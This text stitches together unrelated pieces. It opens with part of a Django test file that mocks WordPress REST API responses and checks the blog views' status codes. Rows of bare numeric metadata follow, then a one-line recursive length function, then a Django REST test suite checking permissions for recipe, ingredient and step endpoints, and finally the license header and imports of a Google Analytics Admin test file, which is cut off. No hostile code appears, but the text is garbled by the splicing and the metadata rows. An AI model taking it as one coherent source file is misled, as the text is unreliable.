'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_view_return_404_if_no_blog(self): """ if no blog, it should raise 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=200, json=[], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') 
responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 404) # CategoryBlogListView @responses.activate def test_category_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 
'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( 
reverse('wordpress_api_blog_category_list', args=('test',))) self.assertEqual(response.status_code, 200) @responses.activate def test_category_view_return_404_if_category_not_exists(self): """ If the category does not exists, it returns 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 
'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_category_list', args=('not-existing',))) self.assertEqual(response.status_code, 404) @responses.activate def test_category_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_category_list', args=('test-category',))) self.assertEqual(response.status_code, 404) # TagBlogListView @responses.activate def test_tag_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 
'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_tag_list', args=('test',))) self.assertEqual(response.status_code, 200) @responses.activate def test_tag_view_return_404_if_tag_not_exists(self): """ If the tag does not exists, the view returns 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 
'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_tag_list', args=('not-existing',))) self.assertEqual(response.status_code, 404) @responses.activate def test_tag_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_tag_list', args=('test-tag',))) self.assertEqual(response.status_code, 404) # BlogByAuthorListView @responses.activate def test_author_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL 
+ 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('test-slug',))) self.assertEqual(response.status_code, 200) @responses.activate def test_author_view_return_404_if_author_does_not_exists(self): """ If the author does not exists, it raises 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('not-existing',))) self.assertEqual(response.status_code, 404) @responses.activate def test_author_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('test-slug',))) self.assertEqual(response.status_code, 404) @responses.activate def 
test_author_view_return_404_no_blogs(self): """ If the wp client get no blogs, returns 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', json=[], status=200, content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('test-slug',))) self.assertEqual(response.status_code, 404)
36.422072
91
0.364687
5,835
75,248
4.598286
0.038046
0.045843
0.061123
0.076404
0.911073
0.896538
0.889009
0.881667
0.874474
0.866386
0
0.020802
0.504891
75,248
2,065
92
36.439709
0.699377
0.041862
0
0.720716
0
0
0.249809
0.013409
0
0
0
0
0.023861
1
0.020607
false
0
0.003254
0
0.024946
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
c705a2134af86dc44de2411889383b96c8fd5d9d
76
py
Python
src/recursive_len/__init__.py
finico/algorithms-python
92ff5840445e50dfa8f4fb22899d70ced2d29584
[ "MIT" ]
null
null
null
src/recursive_len/__init__.py
finico/algorithms-python
92ff5840445e50dfa8f4fb22899d70ced2d29584
[ "MIT" ]
5
2018-08-31T11:13:55.000Z
2018-09-12T10:10:20.000Z
src/recursive_len/__init__.py
finico/algorithms-python
92ff5840445e50dfa8f4fb22899d70ced2d29584
[ "MIT" ]
1
2018-08-31T16:08:00.000Z
2018-08-31T16:08:00.000Z
def recursive_len(arr): return 1 + recursive_len(arr[1:]) if arr else 0
25.333333
51
0.697368
14
76
3.642857
0.642857
0.470588
0.588235
0
0
0
0
0
0
0
0
0.048387
0.184211
76
2
52
38
0.774194
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
7
c72ef21859e6ca99a6a574f94d73c38883aacf1d
15,310
py
Python
recipe_backend/recipes/tests/test_views.py
jbernal0019/Recipe_site
30090b521cac84156cf5f05429a12dd5889f8703
[ "MIT" ]
null
null
null
recipe_backend/recipes/tests/test_views.py
jbernal0019/Recipe_site
30090b521cac84156cf5f05429a12dd5889f8703
[ "MIT" ]
3
2020-02-12T01:22:24.000Z
2021-06-10T21:49:21.000Z
recipe_backend/recipes/tests/test_views.py
jbernal0019/Recipe_site
30090b521cac84156cf5f05429a12dd5889f8703
[ "MIT" ]
null
null
null
import json from unittest import mock from django.test import TestCase from django.urls import reverse from django.contrib.auth.models import User from rest_framework import status from recipes.models import Recipe from recipes.models import Ingredient from recipes.models import Step class ViewTests(TestCase): def setUp(self): self.username = 'foo' self.password = 'foopassword' self.email = 'dev@server.org' self.recipe_name = 'recipe1' self.content_type = 'application/vnd.collection+json' # create basic models # create a user user = User.objects.create_user(username=self.username, email=self.email, password=self.password) # create another user User.objects.create_user(username='another', email='another@server.org', password='another-pass') # create a recipe Recipe.objects.get_or_create(name=self.recipe_name, owner=user) class RecipeListViewTests(ViewTests): """ Test the recipe-list view. """ def setUp(self): super(RecipeListViewTests, self).setUp() self.create_read_url = reverse("recipe-list") self.post = json.dumps({ "template": {"data": [{"name": "name", "value": "another_recipe"}]}}) def test_recipe_create_success(self): self.client.login(username='another', password='another-pass') response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_recipe_create_failure_unauthenticated(self): response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_recipe_list_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.create_read_url) self.assertContains(response, self.recipe_name) def test_plugin_list_success_unauthenticated(self): response = self.client.get(self.create_read_url) self.assertContains(response, self.recipe_name) class RecipeDetailViewTests(ViewTests): """ Test 
the recipe-detail view. """ def setUp(self): super(RecipeDetailViewTests, self).setUp() recipe = Recipe.objects.get(name=self.recipe_name) self.read_update_delete_url = reverse("recipe-detail", kwargs={"pk": recipe.id}) self.put = json.dumps({ "template": {"data": [{"name": "name", "value": "another_recipe"}]}}) def test_recipe_detail_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.recipe_name) def test_recipe_detail_success_unauthenticated(self): response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.recipe_name) def test_recipe_update_success(self): self.client.login(username=self.username, password=self.password) response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertContains(response, "another_recipe") def test_recipe_update_failure_unauthenticated(self): response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_recipe_update_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_recipe_delete_success(self): self.client.login(username=self.username, password=self.password) response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(Recipe.objects.count(), 0) def test_recipe_delete_failure_unauthenticated(self): response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_recipe_delete_failure_access_denied(self): 
self.client.login(username='another', password='another-pass') response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) class RecipeListQuerySearchViewTests(ViewTests): """ Test the recipe-list-query-search view. """ def setUp(self): super(RecipeListQuerySearchViewTests, self).setUp() self.list_url = reverse("recipe-list-query-search") + '?owner_username=' + self.username def test_recipe_list_query_search_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.list_url) self.assertContains(response, self.username) self.assertContains(response, self.recipe_name) def test_plugin_list_query_search_success_unauthenticated(self): response = self.client.get(self.list_url) self.assertContains(response, self.username) self.assertContains(response, self.recipe_name) class IngredientListViewTests(ViewTests): """ Test the ingredient-list view. """ def setUp(self): super(IngredientListViewTests, self).setUp() recipe = Recipe.objects.get(name=self.recipe_name) self.create_read_url = reverse("ingredient-list", kwargs={"pk": recipe.id}) self.text = "Great ingredient" self.post = json.dumps({ "template": {"data": [{"name": "text", "value": self.text}]}}) # add ingredient :-) Ingredient.objects.get_or_create(recipe=recipe, text=self.text) def test_ingredient_create_success(self): self.client.login(username=self.username, password=self.password) response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_ingredient_create_failure_unauthenticated(self): response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_ingredient_create_failure_access_denied(self): self.client.login(username='another', password='another-pass') 
response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_ingredient_list_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.create_read_url) self.assertContains(response, self.text) def test_ingredient_list_success_unauthenticated(self): response = self.client.get(self.create_read_url) self.assertContains(response, self.text) class IngredientDetailViewTests(ViewTests): """ Test the ingredient-detail view. """ def setUp(self): super(IngredientDetailViewTests, self).setUp() # add ingredient :-) recipe = Recipe.objects.get(name=self.recipe_name) self.text = "Great ingredient" (ingredient, tf) = Ingredient.objects.get_or_create(recipe=recipe, text=self.text) self.read_update_delete_url = reverse("ingredient-detail", kwargs={"pk": ingredient.id}) self.update_text = "Another great ingredient" self.put = json.dumps({ "template": {"data": [{"name": "text", "value": self.update_text}]}}) def test_ingredient_detail_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_ingredient_detail_success_unauthenticated(self): response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_ingredient_update_success(self): self.client.login(username=self.username, password=self.password) response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertContains(response, self.update_text) def test_ingredient_update_failure_unauthenticated(self): response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def 
test_ingredient_update_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_ingredient_delete_success(self): self.client.login(username=self.username, password=self.password) response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(Ingredient.objects.count(), 0) def test_ingredient_delete_failure_unauthenticated(self): response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_ingredient_delete_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) class StepListViewTests(ViewTests): """ Test the step-list view. 
""" def setUp(self): super(StepListViewTests, self).setUp() recipe = Recipe.objects.get(name=self.recipe_name) self.create_read_url = reverse("step-list", kwargs={"pk": recipe.id}) self.text = "Great step" self.post = json.dumps({ "template": {"data": [{"name": "step_text", "value": self.text}]}}) # add step Step.objects.get_or_create(recipe=recipe, step_text=self.text) def test_step_create_success(self): self.client.login(username=self.username, password=self.password) response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_step_create_failure_unauthenticated(self): response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_step_create_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_step_list_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.create_read_url) self.assertContains(response, self.text) def test_step_list_success_unauthenticated(self): response = self.client.get(self.create_read_url) self.assertContains(response, self.text) class StepDetailViewTests(ViewTests): """ Test the step-detail view. 
""" def setUp(self): super(StepDetailViewTests, self).setUp() # add step recipe = Recipe.objects.get(name=self.recipe_name) self.text = "Great step" (step, tf) = Step.objects.get_or_create(recipe=recipe, step_text=self.text) self.read_update_delete_url = reverse("step-detail", kwargs={"pk": step.id}) self.update_text = "Another great step" self.put = json.dumps({ "template": {"data": [{"name": "step_text", "value": self.update_text}]}}) def test_step_detail_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_step_detail_success_unauthenticated(self): response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_step_update_success(self): self.client.login(username=self.username, password=self.password) response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertContains(response, self.update_text) def test_step_update_failure_unauthenticated(self): response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_step_update_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_step_delete_success(self): self.client.login(username=self.username, password=self.password) response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(Ingredient.objects.count(), 0) def test_step_delete_failure_unauthenticated(self): response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, 
status.HTTP_401_UNAUTHORIZED) def test_step_delete_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
43.005618
96
0.68661
1,796
15,310
5.614699
0.058463
0.063467
0.0714
0.05355
0.863348
0.84044
0.807517
0.797402
0.780742
0.765073
0
0.006042
0.210843
15,310
355
97
43.126761
0.828588
0.022142
0
0.608163
0
0
0.046847
0.003702
0
0
0
0
0.183673
1
0.195918
false
0.110204
0.036735
0
0.265306
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
c739fa56cafe5c3ba23300537dde93b0a590781b
863,917
py
Python
tests/unit/gapic/admin_v1alpha/test_analytics_admin_service.py
renovate-bot/python-analytics-admin
c3310773def7a76fee4c061ff0881cd176507626
[ "Apache-2.0" ]
null
null
null
tests/unit/gapic/admin_v1alpha/test_analytics_admin_service.py
renovate-bot/python-analytics-admin
c3310773def7a76fee4c061ff0881cd176507626
[ "Apache-2.0" ]
null
null
null
tests/unit/gapic/admin_v1alpha/test_analytics_admin_service.py
renovate-bot/python-analytics-admin
c3310773def7a76fee4c061ff0881cd176507626
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import mock import packaging.version import grpc from grpc.experimental import aio import math import pytest from proto.marshal.rules.dates import DurationRule, TimestampRule from google.analytics.admin_v1alpha.services.analytics_admin_service import ( AnalyticsAdminServiceAsyncClient, ) from google.analytics.admin_v1alpha.services.analytics_admin_service import ( AnalyticsAdminServiceClient, ) from google.analytics.admin_v1alpha.services.analytics_admin_service import pagers from google.analytics.admin_v1alpha.services.analytics_admin_service import transports from google.analytics.admin_v1alpha.services.analytics_admin_service.transports.base import ( _GOOGLE_AUTH_VERSION, ) from google.analytics.admin_v1alpha.types import analytics_admin from google.analytics.admin_v1alpha.types import resources from google.api_core import client_options from google.api_core import exceptions as core_exceptions from google.api_core import gapic_v1 from google.api_core import grpc_helpers from google.api_core import grpc_helpers_async from google.api_core import path_template from google.auth import credentials as ga_credentials from google.auth.exceptions import MutualTLSChannelError from google.oauth2 import service_account from google.protobuf import field_mask_pb2 # type: ignore from google.protobuf import timestamp_pb2 # type: ignore from google.protobuf import wrappers_pb2 # 
